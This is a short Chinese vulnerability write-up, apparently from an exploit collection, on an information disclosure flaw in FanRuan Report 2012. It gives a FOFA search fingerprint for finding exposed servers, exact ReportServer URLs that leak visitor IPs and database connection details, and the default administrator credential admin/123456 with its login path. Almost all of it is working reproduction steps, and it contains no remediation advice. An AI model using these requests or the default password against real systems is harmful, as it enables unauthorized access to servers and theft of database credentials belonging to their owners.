帆软报表 2012 信息泄露漏洞
漏洞描述
帆软报表 2012 存在信息泄露漏洞,通过访问特定的Url获取部分敏感信息
漏洞影响
[!NOTE]
帆软报表 2012
FOFA
[!NOTE]
body="down.download?FM_SYS_ID"
漏洞复现
获取登录报表系统的IP
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false
数据库信息泄露
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
后台默认口令 admin/123456
/ReportServer?op=fr_auth&cmd=ah_login&_=new%20Date().getTime()